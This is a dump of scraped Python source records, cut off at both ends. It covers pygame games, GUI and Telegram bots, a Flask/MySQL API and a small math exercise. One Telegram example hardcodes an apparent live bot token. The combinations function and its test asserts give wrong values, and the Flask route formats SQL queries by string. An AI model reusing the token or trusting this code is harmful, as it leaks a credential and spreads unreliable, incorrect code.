pressed[pygame.K_s]:\n\t\tpaddle1.moveUp()\n\n\tif pressed[pygame.K_UP]:\n\t\tpaddle2.moveDown()\n\telif pressed[pygame.K_DOWN]:\n\t\tpaddle2.moveUp()\n\n\n\t# collision of paddle with top/bottom of screen\n\tpaddle1.updateVerticalPosition()\n\n\tpaddle2.updateVerticalPosition()\n\n\tgame_screen.fill(COURT_COLOR)\n\n\n\tfor ball_id in ball_dict:\n\n\t\tball = ball_dict[ball_id]\n\n\t\tball.updatePosition()\n\n\t\t# left paddle\n\t\tif ball.getXPos() < paddle1.getXPos() + paddle1.getWidth() and ball.getYPos() >= paddle1.getYPos() and ball.getYPos() <= paddle1.getYPos() + paddle1.getHeight():\n\t\t\tball.changeXVel()\n\n\t\t# right paddle\n\t\tif ball.getXPos() > paddle2.getXPos() and ball.getYPos() 
>= paddle2.getYPos() and ball.getYPos() <= paddle2.getYPos() + paddle2.getHeight():\n\t\t\tball.changeXVel()\n\n\t\t# keeping score\n\t\tif ball.getXPos() <= 0:\n\n\t\t\tscore_keeper.incrementPlayer2Score()\n\t\t\t\n\t\t\tremove_ball(ball_id)\n\n\t\t\tpoint_scored()\n\n\t\telif ball.getXPos() >= screen_width:\n\n\t\t\tscore_keeper.incrementPlayer1Score()\n\n\t\t\tremove_ball(ball_id)\n\n\t\t\tpoint_scored()\n\n\t\tballr = pygame.draw.circle(game_screen, BALL_COLOR, (ball.getXPos(), ball.getYPos()), ball.getRadius(), 0)\n\t\tprint(\"moving ball %s\" % ball.getId())\n\n\n\tpaddle_1 = pygame.draw.rect(game_screen, PADDLE_COLOR, (paddle1.getXPos(), paddle1.getYPos(), paddle1.getWidth(), paddle1.getHeight()), 0)\n\t\n\tpaddle_2 = pygame.draw.rect(game_screen, PADDLE_COLOR, (paddle2.getXPos(), paddle2.getYPos(), paddle2.getWidth(), paddle2.getHeight()), 0)\n\t\n\tnet = pygame.draw.line(game_screen, NET_COLOR, (screen_width/2,5), (screen_width/2, screen_height))\n\t\n\tscore_text = font.render(str(score_keeper.getPlayer1Score()) + \" \" + str(score_keeper.getPlayer2Score()), 1, SCORE_TEXT_COLOR)\n\n\tgame_screen.blit(score_text, (screen_width / 2 - score_text.get_width() / 2, 10))\n\n\tpygame.display.update()\n\n\ttime.sleep(0.016666667)\n\n\n\npygame.quit()\n\n","sub_path":"python-projects-for-kids/tiny_oo_lotsa_balls.py","file_name":"tiny_oo_lotsa_balls.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"626611935","text":"\"\"\"Holds a reference to the main Window instance and provides the MainPage\r\nclass.\"\"\"\r\n\r\nimport pyglet\r\nfrom pyglet.event import EVENT_HANDLED\r\nfrom pyglet.window import key\r\nfrom pyperclip import copy\r\nfrom attr import attrs\r\nfrom pyglet_pages.pages import Page, Modifiers\r\nfrom pyglet_pages.controls import Menu, Text\r\nimport application\r\nfrom messages import container\r\nfrom speech import speak, output\r\n\r\n\r\ndef loop():\r\n \"\"\"The main event loop.\"\"\"\r\n while True:\r\n pyglet.clock.tick()\r\n for window in pyglet.app.windows:\r\n window.switch_to()\r\n window.dispatch_events()\r\n window.dispatch_event('on_draw')\r\n window.flip()\r\n yield\r\n\r\n\r\n@attrs\r\nclass MainPage(Page):\r\n \"\"\"The page which sends hotkeys to the server.\"\"\"\r\n\r\n def __attrs_post_init__(self):\r\n self.hotkey('UP', modifiers=Modifiers(shift=True))(self.view_item)\r\n self.hotkey('DOWN', modifiers=Modifiers(shift=True))(self.copy_item)\r\n for direction in ('left', 'right', 'up', 'down', 'home', 'end'):\r\n self.hotkey(direction.upper())(getattr(self, f'do_{direction}'))\r\n\r\n def do_left(self, symbol, modifiers):\r\n \"\"\"Previous buffer.\"\"\"\r\n return self.change_buffer(-1)\r\n\r\n def do_right(self, symbol, modifiers):\r\n return self.change_buffer(1)\r\n\r\n def do_up(self, symbol, modifiers):\r\n return self.change_message(-1)\r\n\r\n def do_down(self, symbol, modifiers):\r\n return self.change_message(1)\r\n\r\n def do_home(self, symbol, modifiers):\r\n return self.get_end_item('first')\r\n\r\n def do_end(self, symbol, modifiers):\r\n return self.get_end_item('last')\r\n\r\n def copy_item(self, symbol, modifiers):\r\n \"\"\"Copy the current buffer item to the clipboard.\"\"\"\r\n if not container.buffers:\r\n speak('There are no buffers yet.')\r\n else:\r\n b = container.buffer\r\n if b is None:\r\n b = container.next_buffer()\r\n try:\r\n i = b.get_current_item()\r\n copy(i)\r\n speak(f'Copied {i}')\r\n except IndexError:\r\n speak('Buffer is empty.')\r\n return EVENT_HANDLED\r\n\r\n def view_item(self, symbol, modifiers):\r\n \"\"\"View the current buffer item in a text box.\"\"\"\r\n if not container.buffers:\r\n speak('There are no buffers yet.')\r\n else:\r\n b = container.buffer\r\n if b is None:\r\n b = container.next_buffer()\r\n try:\r\n i = b.get_current_item()\r\n m = Menu('View Buffer Item', escapable=True)\r\n m.add_control(Text, 'Item', text=i)\r\n m.attach(application.window)\r\n except IndexError:\r\n speak('Buffer is empty.')\r\n return EVENT_HANDLED\r\n\r\n def get_end_item(self, name):\r\n if not container.buffers:\r\n speak('There are no buffers yet.')\r\n else:\r\n b = container.buffer\r\n if b is None:\r\n b = container.next_buffer()\r\n try:\r\n message = getattr(b, f'get_{name}_item')()\r\n speak(message)\r\n except IndexError:\r\n speak('This buffer is empty.')\r\n return EVENT_HANDLED\r\n\r\n def change_buffer(self, direction):\r\n if not container.buffers:\r\n speak('There are no buffers yet.')\r\n else:\r\n if direction == -1:\r\n buffer = container.previous_buffer()\r\n else:\r\n buffer = container.next_buffer()\r\n speak(buffer.name or 'Miscelaneous')\r\n return EVENT_HANDLED\r\n\r\n def change_message(self, direction):\r\n if not container.buffers:\r\n speak('There are no buffers yet.')\r\n else:\r\n b = container.buffer\r\n if b is None:\r\n b = container.next_buffer()\r\n elif not b.items:\r\n speak('This buffer is empty.')\r\n if direction == 1:\r\n func = b.get_next_item\r\n end = 
'end'\r\n else:\r\n func = b.get_previous_item\r\n end = 'Start'\r\n try:\r\n message = func(wrap=False)\r\n speak(message)\r\n except RuntimeError:\r\n speak(f'{end} of buffer.')\r\n speak(b.get_current_item())\r\n return EVENT_HANDLED\r\n\r\n def on_key_press(self, symbol, modifiers):\r\n if symbol == key.LCTRL and modifiers == key.MOD_CTRL:\r\n o = output.get_first_available_output()\r\n if o.system_output:\r\n o.silence()\r\n if super().on_key_press(symbol, modifiers) is not EVENT_HANDLED:\r\n if symbol == key.F4 and modifiers & key.MOD_ALT:\r\n return\r\n elif application.connection is None:\r\n speak('You are not currently connected.')\r\n else:\r\n if modifiers:\r\n mods = key.modifiers_string(\r\n modifiers\r\n ).lower().replace('mod_', '').split('|')\r\n else:\r\n mods = []\r\n application.connection.send(\r\n 'key', key.symbol_string(symbol).strip('_'), mods\r\n )\r\n return EVENT_HANDLED\r\n","sub_path":"client/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":5392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"140146089","text":"#coding = utf-8\n\nimport os\n\ntrain_img_path = '/home/flyingbird/Documents/reid_competition/test/query_a'\ntrain_txt_path = '/home/flyingbird/Documents/reid_competition/test/query_a_list.txt'\n# test_img_path = '/home/zx/zxfile/contest/deep-person-reid-master/torchreid/data/contestdata/query'\n# test_txt_path = '/home/zx/zxfile/contest/deep-person-reid-master/torchreid/data/contestdata/query_a_list.txt'\nnum=0\nwith open(train_txt_path, 'r') as file:\n lines = file.readlines()\n for line in lines:\n line=line.strip('\\n').split(' ')\n #img_id = int(line[1])\n img_id = line[1].zfill(4)\n img_name = line[0].split('/')[1]\n cam_id = 'c1'\n src = os.path.join(os.path.abspath(train_img_path),img_name)\n dst = os.path.join(os.path.abspath(train_img_path),format(str(img_id),'0>4s')+'_'+cam_id+'_'+img_name[:-4]+'.png')\n\n try:\n os.rename(src,dst)\n num+=1\n print('convert %s to %s..' % (src, dst))\n except:\n continue\n\nprint ('total %d to rename ' % (num))\n\n","sub_path":"data/test/datadeal.py","file_name":"datadeal.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"315717956","text":"import json\nfrom data_process import MSSQL\n\nif __name__ == '__main__':\n #dt = input()\n #table_name = 'UserPingListTable{}'.format(dt)\n with open('db_settings', 'r') as sf:\n s = json.load(sf)\n db = MSSQL(host=s['host'], user=s['user'], pwd=s['pwd'], db=s['db'])\n\n #db.deal_raw_table(table_name)\n #db.process_data(table_name)\n db.get_report()\n","sub_path":"UserPingReceiver/DealWithTables/deal_a_table.py","file_name":"deal_a_table.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"450812829","text":"import sys\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow\n\nfrom Login import Login\nfrom Home import Home\nfrom TrangChu import TrangChu\nfrom NhanVien import NhanVien\nfrom Update_Info import Update_Info\nfrom Update import update\nfrom HomeNV import HomeNV\nclass Controller:\n\n def __init__(self):\n self.home = QMainWindow()\n self.dia = None\n\n def show_login(self):\n self.login = Login()\n self.login.switch_window.connect(self.show_home)\n self.login.switch_window2.connect(self.show_home_NV)\n\n if self.home.isVisible():\n self.home.close()\n #self.login.show()\n\n def show_home(self):\n self.home = Home()\n self.home.switch_window.connect(self.show_window_two)\n self.home.switch_window2.connect(self.show_window_two_NV)\n self.login.close()\n #self.home.show()\n\n def show_home_NV(self):\n self.home = HomeNV()\n self.home.switch_window.connect(self.show_window_two)\n self.login.close()\n\n def show_window_two(self):\n if self.dia is None:\n self.dia = TrangChu()\n self.home.mdi.addSubWindow(self.dia)\n self.dia.switch_window.connect(self.show_login)\n self.dia.show()\n else:\n if self.dia.isVisible():\n self.dia.close()\n self.dia = None\n\n def show_window_two_NV(self):\n if self.dia is None:\n self.dia = NhanVien()\n self.home.mdi.addSubWindow(self.dia)\n self.dia.switch_window.connect(self.show_update_info)\n # self.dia.switch_window.connect(self.show_login)\n self.dia.show()\n else:\n if self.dia.isVisible():\n self.dia.close()\n self.dia = None\n\n def show_update_info(self):\n self.update_info = Update_Info()\n self.update_info.switch_window.connect(self.show_update)\n\n\n def show_update(self):\n self.update = update(self.update_info.txtTim.text())\n\n\n\n\n\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n controller = Controller()\n controller.show_login()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()","sub_path":"pyqt5/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"171662175","text":"# -*- coding: UTF-8 -*-\r\nimport gevent.monkey\r\ngevent.monkey.patch_all()\r\nimport os\r\nimport sys\r\nimport pwd\r\nimport signal\r\nimport time\r\nimport socket\r\nimport logging\r\nimport asyncore\r\n\r\nclass EchoClient(asyncore.dispatcher):\r\n \"\"\"Sends messages to the server and receives responses.\r\n \"\"\"\r\n\r\n def __init__(self, host, port, message, chunk_size=512):\r\n self.message = message\r\n self.to_send = message\r\n self.received_data = []\r\n self.chunk_size = chunk_size\r\n self.logger = logging.getLogger('EchoClient')\r\n asyncore.dispatcher.__init__(self)\r\n self.create_socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.logger.debug('connecting to %s', (host, port))\r\n self.connect((host, port))\r\n return\r\n\r\n def handle_connect(self):\r\n self.logger.debug('handle_connect()')\r\n\r\n def handle_close(self):\r\n self.logger.debug('handle_close()')\r\n self.close()\r\n received_message = ''.join(self.received_data)\r\n if received_message == self.message:\r\n self.logger.debug('RECEIVED COPY OF MESSAGE')\r\n else:\r\n self.logger.debug('ERROR IN TRANSMISSION')\r\n self.logger.debug('EXPECTED \"%s\"', self.message)\r\n self.logger.debug('RECEIVED \"%s\"', received_message)\r\n return\r\n\r\n def writable(self):\r\n self.logger.debug('writable() -> %s', bool(self.to_send))\r\n return bool(self.to_send)\r\n\r\n def handle_write(self):\r\n sent = self.send(self.to_send[:self.chunk_size])\r\n self.logger.debug('handle_write() -> (%d) \"%s\"', sent, self.to_send[:sent])\r\n self.to_send = self.to_send[sent:]\r\n\r\n def handle_read(self):\r\n data = self.recv(self.chunk_size)\r\n self.logger.debug('handle_read() -> (%d) \"%s\"', len(data), data)\r\n self.received_data.append(data)\r\n\r\ndef handle_exit(*args, **kw):\r\n logging.info('emstpd(pid=%s) exited', os.getpid())\r\n sys.exit()\r\n\r\nif __name__ == '__main__':\r\n logging.basicConfig(level=logging.DEBUG,\r\n # format='%(name)s: %(message)s',\r\n format='%(asctime)s %(levelname)s %(module)s:%(lineno)s %(message)s',\r\n )\r\n\r\n client = EchoClient('localhost', 33333, message=open('requirement.txt', 'r').read())\r\n\r\n try:\r\n asyncore.loop()\r\n except KeyboardInterrupt:\r\n pass","sub_path":"python/ap/_gevent/g_client.py","file_name":"g_client.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"95806800","text":"from html import escape\nfrom uuid import uuid4\n\nfrom telegram import InlineQueryResultArticle, InputTextMessageContent, Update\nfrom telegram.constants import ParseMode\nfrom telegram.ext import Application, CommandHandler, ContextTypes, InlineQueryHandler\n\n\nasync def start(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n\n \"\"\"Send a message when the command /start is issued.\"\"\"\n\n await update.message.reply_text(\"Hi!\")\n\n\nasync def help_command(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n\n \"\"\"Send a message when the command /help is issued.\"\"\"\n\n await update.message.reply_text(\"Help!\")\n\n\nasync def inline_query(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n\n \"\"\"Handle the inline query. This is run when you type: @botusername \"\"\"\n\n query = update.inline_query.query\n\n if query == \"\":\n return\n results = [\n InlineQueryResultArticle(\n id=str(uuid4()),\n title=\"Caps\",\n input_message_content=InputTextMessageContent(query.upper()),\n ),\n InlineQueryResultArticle(\n id=str(uuid4()),\n title=\"Bold\",\n input_message_content=InputTextMessageContent(\n f\"{escape(query)}\", parse_mode=ParseMode.HTML\n ),\n ),\n InlineQueryResultArticle(\n id=str(uuid4()),\n title=\"Italic\",\n input_message_content=InputTextMessageContent(\n f\"{escape(query)}\", parse_mode=ParseMode.HTML\n ),\n ),\n\n ]\n\n await update.inline_query.answer(results)\n\n\ndef main() -> None:\n\n application = Application.builder().token(\"5519492104:AAHqshbIG-CmFdl6UDLSRqJWi4XtLvriaCw\").build()\n\n # on different commands - answer in Telegram\n application.add_handler(CommandHandler(\"start\", start))\n application.add_handler(CommandHandler(\"help\", help_command))\n\n # on non command i.e message - echo the message on Telegram\n application.add_handler(InlineQueryHandler(inline_query))\n # Run the bot until the user presses Ctrl-C\n\n application.run_polling()\n\n\nasync def inline_caps(self, update, context):\n \"\"\"Handle the inline query. This is run when you type: @botusername \"\"\"\n query = update.inline_query.query\n if not query:\n return\n results = [InlineQueryResultArticle(\n id=query.upper(),\n title='Caps',\n input_message_content=InputTextMessageContent(query.upper())\n ), InlineQueryResultArticle(\n id=str(uuid4()),\n title=\"Bold\",\n input_message_content=InputTextMessageContent(\n f\"{escape(query)}\", parse_mode=ParseMode.HTML\n ),\n ), InlineQueryResultArticle(\n id=str(uuid4()),\n title=\"Italic\",\n input_message_content=InputTextMessageContent(\n f\"{escape(query)}\", parse_mode=ParseMode.HTML\n ),\n )]\n await context.bot.answer_inline_query(update.inline_query.id, results)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"IMPORTANT/telegram_bots/telegram/example/inline.py","file_name":"inline.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"153577226","text":"#FileName: Final CST Project.py\n#Description: The final project will be another game that will incorporate\n#the multimedia aspect by increasing the frequency of the sound in the game\n#as the user progresses throught the game.\n#Authors: Joseph Molina and Jose Cortez\n#Date: 4/13/15\n#Version:1\n#Compiler: Python 3.4\n\nimport pygame, sys, time, random\nfrom pygame.locals import *\n#To be able to use pygame\n#To be able to use the time module\n#To be able to use the random functions\n\n#Importing the classes and process into the main so it could utilize them\nfrom classes import *\nfrom process import process \n\n#importing both the image and imagefilter modules to manipulate images\nfrom PIL import Image\nfrom PIL import ImageFilter\nfrom sound import GameMusic\n\npygame.init()\n#To be able to use all of pygames features\n\n#This will display the screen of the game with the size of 740 by 830\nSCREENWIDTH = 1400\nSCREENHEIGHT = 650\n\n#Screen of the game with the height and width\nscreen = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT),0,32)\n\n#The clock of the game to keep track of time\nclock = pygame.time.Clock()\n#Setting the frames per second \nFPS = 24\n#total_frames will be used in the enemys movement\ntotal_frames = 0\n\n#Line of code will set the name of the screen\npygame.display.set_caption('Final CST Project')\n\n#RGB values for the colors\nblack = (0,0,0)\nwhite = (255,255,255)\nred = (200,0,0)\ngreen = (0,200,0)\nblue = (0,0, 255)\norange = (255,128,128)\ngray = (128,128,128)\nsilver = (192,192,192)\n\n#Declaring the font and font size for the score\nsmallfont = pygame.font.SysFont(\"comicsansms\",25)\n#setting the window to display the score\ngameDisplay = pygame.display.set_mode((SCREENWIDTH,SCREENHEIGHT))\n\n#Loading the image of the bug into the bottom left hand corner of the screen\nbug = Bug(700,SCREENHEIGHT - 120,200,150,'C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\flippedEnemy1.png')\n\n#Loading the image of an enemy into the right hand corner of the screen\nenemy = Enemy(1100,SCREENHEIGHT - 120,120,120,'C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\killer.png')\n#Loading a ghost into the right hand corner of the screen \nenemy1 = Enemy(1000,SCREENHEIGHT - 110, 120,120,'C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\ghost.png')\nenemy2 = Enemy(1000,SCREENHEIGHT - 110, 120,120,'C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\ghost.png')\nenemy3 = Enemy(1000,SCREENHEIGHT - 110, 120,120,'C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\ghost.png')\n\n#Setting up the default font of the letters\nfont = pygame.font.SysFont(None, 25)\n\n#Function that will display the score\ndef score(score):\n text = smallfont.render(\"Score: \" + str(score), True, white)\n #Displaying the score in the upper left hand corner of the screen\n gameDisplay.blit(text, [0,0])\n \n#Function to display the title of the screen in the game intro\n#This function will also display a copyright image before the game initiates\ndef display_text_animation(string):\n #Loading in the copyright image and also displaying it in the center of the screen\n copyright1 = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\copyright.png')\n screen.blit(copyright1, (SCREENWIDTH/3, 650 / 4.5))\n pygame.display.flip()\n \n #Loading in the typewriter sound effect for the game intro\n pygame.mixer.music.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\typewriter.ogg')\n pygame.mixer.music.play(1)\n \n #For how long the screen to wait\n 
time.sleep(2)\n #The text is equal to what is inserted into the parameters\n text = ''\n\n \n #This loop will blit one character of a time from the string array into\n #the screen\n for i in range(len(string)):\n screen.fill(silver)\n text += string[i]\n text_surface = font.render(text, True, black)\n text_rect = text_surface.get_rect()\n text_rect.center = (SCREENWIDTH/2, SCREENHEIGHT/2)\n screen.blit(text_surface, text_rect)\n pygame.display.update()\n pygame.time.wait(300)\n pygame.mixer.music.stop()\n \n#Game main loop\ndef main():\n #Loading the music for the title screen of the game and playing it infintely.\n sound = pygame.mixer.Sound('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\KeyGen.wav')\n sound.play(loops = -1)\n #Boolean to determine which sound file to play\n start_music = True\n #Setting the default value of score\n total_score = 0\n #using time variable as a way to keep track of the seconds\n time = 0\n #Loading the image of the background\n backgroundImg = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\space.jpg')\n while True:\n \n time = time + 1\n #If statement to change the background image of the program\n if time == 300:\n backgroundImg = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\anything.jpg')\n if time == 500:\n backgroundImg = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\space.jpg')\n if time == 700:\n backgroundImg = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\anything3.jpg')\n if time == 900:\n backgroundImg = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\magicEarth.jpg')\n if time == 990:\n backgroundImg = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\space.jpg')\n \n global total_frames\n current_score = BaseClass.total_score\n process(bug, FPS, total_frames, SCREENHEIGHT, current_score)\n\n #LOGIC\n bug.motion(SCREENWIDTH, SCREENHEIGHT)\n Enemy.update_all(SCREENWIDTH)\n #Enemy.movement(SCREENWIDTH)\n BugProjectile.movement()\n total_frames += 1\n\n\n #Bliting the image of the background into the screen at the given coordinates\n screen.blit(backgroundImg, (0,0))\n \n #Draws all the sprites to the screen\n BaseClass.allsprites.draw(screen)\n #If statement to change the pace of the music\n score(BaseClass.total_score)\n if BaseClass.total_score > 300 and start_music:\n start_music = False\n sound.stop()\n GameMusic()\n \n #Makes sure that everything is being drawn on the screen\n pygame.display.flip()\n #How many frames are going to be in a second\n clock.tick(FPS)\n \n \n#Calling out the functions in the order of \ndisplay_text_animation('Welcome to Jose and Joseph CST Project!')\nmain()\npygame.display.update()\ntime.sleep(2)\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"378545341","text":"def get_largest_prime_below(x):\n '''\n Determina cel mai mic numar prim mai mic decat n\n :param x: numar intreg\n :return: Cel mai mic numar prim mai mic decat n\n '''\n if (x == 1):\n return print(\"Nu exista numere prime mai mici decat 1!\")\n if (x == 2):\n return 1\n for i in range(x - 1, 0, -1):\n a = 0\n for j in range(2, i // 2):\n if i % j == 0:\n a = 1\n if a == 0:\n return i\n\ndef test_get_largest_prime_below():\n assert get_largest_prime_below(6) == 5\n assert get_largest_prime_below(10) == 7\n assert get_largest_prime_below(100) == 97\n\n\ndef is_palindrome(n):\n '''\nVerifica daca un numar este palindrom\n :param n: numar intreg\n :return: Retruneaza adevarat daca nr este palindrom si False in caz contrar\n '''\n if n < 10:\n return False\n ogl = 0\n aux = n\n while aux > 0:\n ogl = ogl * 10 + aux % 10\n aux = aux // 10\n if ogl == n:\n return True\n else:\n return False\n\n\ndef test_is_palindrome():\n assert is_palindrome(1) is False\n assert is_palindrome(123421) is False\n assert is_palindrome(1234321) is True\n\n\ndef get_n_choose_k(n: int, k: int):\n '''\nCalculeaza combinari de n luate cate k\n :param n: nr intreg\n :param k: nr intreg\n :return: Combinari de n luate cate k\n '''\n if k > n:\n return print(\"Nu exista\")\n if n == k:\n return 1\n factn = 1\n factk = 1\n factnk = 1\n for i in range(1, n):\n factn = factn * i\n for j in range(1, k):\n factk = factk * j\n for z in range(1, n - k):\n factnk = factnk * z\n result = 0\n result = factn // (factk * factnk)\n return result\n\n\ndef test_get_n_choose_k():\n assert get_n_choose_k(2, 1) == 1\n assert get_n_choose_k(10, 4) == 504\n assert get_n_choose_k(10, 9) == 9\n\ndef main():\n print(\"\"\"\"\n 1 ,Găsește ultimul număr prim mai mic decât un număr dat.\n 2 ,Verifica daca un numar este palindrom.\n 3 ,Calculeaza Combinari de n luate cate k\n b ,Inapoi la meniu\n x, Iesire\n \"\"\"\"\")\n while True:\n option = input(\"Alegeti o optiune\")\n if option == \"1\":\n z = int(input())\n print(get_largest_prime_below(z))\n elif option == '2':\n print(\"introduceti un numar:\")\n w = int(input())\n if is_palindrome(w) is True:\n print(\"Este palindrom\")\n else:\n print(\"Nu este palindrom\")\n elif option == \"3\":\n print(\"Introduceti un numar\")\n a = int(input())\n b = int(input())\n print(get_n_choose_k(a, b))\n elif option == 'b':\n print(\"\"\"\"\n 1 ,Găsește ultimul număr prim mai mic decât un număr dat.\n 2 ,Verifica daca un numar este palindrom.\n 3 ,Calculeaza Combinari de n luate cate k\n b, Inapoi la meniu\n x, Iesire\n \"\"\"\"\")\n\n elif option == 'x':\n break\n\n else:\n print(\"Nu ati ales o optiune valida\")\n\nif __name__ == '__main__':\n main()","sub_path":"pythonProject lab 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"253845869","text":"from flask import Flask, jsonify, request\nfrom flaskext.mysql import MySQL\n# from wtforms import TextField, Form\n\napp = Flask(__name__)\n\nmysql = MySQL()\napp.config['MYSQL_DATABASE_USER'] = ''\napp.config['MYSQL_DATABASE_PASSWORD'] = ''\napp.config['MYSQL_DATABASE_DB'] = ''\napp.config['MYSQL_DATABASE_HOST'] = ''\n\nmysql.init_app(app)\n\n# 네이버나 구글 검색처럼 자동완성 기능으로 구현해보려 합니다. 한글자 칠 때 마다 서버에 요청하기 때문에\n# 글자당 쿼리를 요청할 수는 없어서 일단 하드코딩으로 박아넣었습니다.\n# 추후엔 플라스크앱이 처음 실행시 데이터베이스에서 선수 리스트를 받아 JSON 파일로 저장하여 사용하면\n# 좋을 듯 합니다.\n\n# 일단은 데이터베이스에서 선수명을 받아 JSON 으로 만든 것을 가정하여 코드를 작성했습니다.\n\n# 선수이름 리스트\n\nPLAYERNAMES = [\"임창용\", \"윤석민\", \"임기준\", \"김윤동\", \"김민식\", \"유승철\", \"한승택\"]\n\n# 클라이언트 브라우저에게 선수이름 textfield 값 받아오기\n#\n# class SearchForm(Form):\n# autocomplete = TextField('autocomplete', id='playername')\n\n@app.route('/')\ndef get():\n cur = mysql.connect().cursor()\n cur.execute('''select * from test''')\n r = [dict((cur.description[i][0], value)\n for i, value in enumerate(row)) for row in cur.fetchall()]\n\n return jsonify({'result' : r})\n\n# 클라이언트에서 http://서버주소/searchplayer GET 방식으로 요청시\n# 클라이언트 코드를 아직 완성하지 못했습니다.\n# 클라이언트를 만들면서 수정하게 될 가능성이 큽니다.\n# 아직 데이터베이스 쿼리 부분을 작성하지 못했습니다.\n\n@app.route('/searchplayer', methods=['GET'])\ndef searchplayer():\n search = request.args.get('playername')\n\n return jsonify(json_list=PLAYERNAMES)\n\n\n# personId 를 기준으로 person 테이블의 해당 선수의 정보를 가져옵니다.\n# URL 요청 방법은\n# http://localhost:3000/playerdetails/293847 형태로 조회하면 됩니다.\n@app.route('/playerdetails/', methods=['GET'])\ndef playerdetails(personid):\n\n cur = mysql.connect().cursor()\n cur.execute('''SELECT * FROM person WHERE personId=%d''' % (personid))\n\n r = [dict((cur.description[i][0], value)\n for i, value in enumerate(row)) for row in cur.fetchall()]\n\n return jsonify({'result': r})\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"flaskapi.py","file_name":"flaskapi.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"638247214","text":"from .errors import InvalidACTARequestError, InvalidACTAHandlerError\nfrom voluptuous import Schema, Invalid, MultipleInvalid\n\n\ndef _validate_is_callable(obj):\n is_callable = hasattr(obj, '__call__')\n if not is_callable:\n raise Invalid('The request handler must be a callable')\n\n return obj\n\n\nrequest_schema = Schema({\n 'actor': str,\n 'object': str,\n 'meta': dict,\n 'handler': _validate_is_callable\n})\n\n\nasync def validate_request(spec, request):\n try:\n request_schema(spec)\n except MultipleInvalid as e:\n raise InvalidACTARequestError(str(e))\n\n return spec.get('handler')\n","sub_path":"acta/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"547454660","text":"import logging\nimport time\n\nfrom telegram.ext import Updater, CommandHandler\n\nlogger = logging.getLogger(__name__)\n\nmsg_q = None\ncreation_q = None\nconfig = None\ndpg = None\n\n\ndef run(message_queue, creation_queue, cfg):\n global msg_q, creation_q, config, dpg\n msg_q = message_queue\n config = cfg\n creation_q = creation_queue\n\n updater = Updater(config['bot_token'], use_context=True)\n dp = updater.dispatcher\n\n dp.add_error_handler(error)\n\n updater.start_polling()\n\n dp.job_queue.run_repeating(msg_listener, 5)\n\n dpg = dp\n\n\ndef msg_listener(context):\n if not msg_q.empty():\n msg = msg_q.get()\n\n if msg.group:\n send(context, \"[WA]\" + msg.group, msg)\n else:\n send(context, \"[WA]\" + msg.author, msg)\n msg_q.task_done()\n\n\ndef send(context, toChannelName, msg):\n # try sending\n for gId in dpg.groups:\n if context.bot.get_chat(gId).title == toChannelName:\n context.bot.send_message(chat_id=gId, text=\"{}:\\n\\n{}\".format(msg.author, msg.body))\n return True\n\n # group not found\n creation_q.put(toChannelName)\n while not creation_q.empty():\n logger.info(\"Group not found, initiated creation...\")\n time.sleep(1)\n\n # try again\n for gId in dpg.groups:\n if context.bot.get_chat(gId).title == toChannelName:\n context.bot.send_message(chat_id=gId, text=\"{}:\\n\\n{}\".format(msg.author, msg.body))\n return True\n\n\ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, 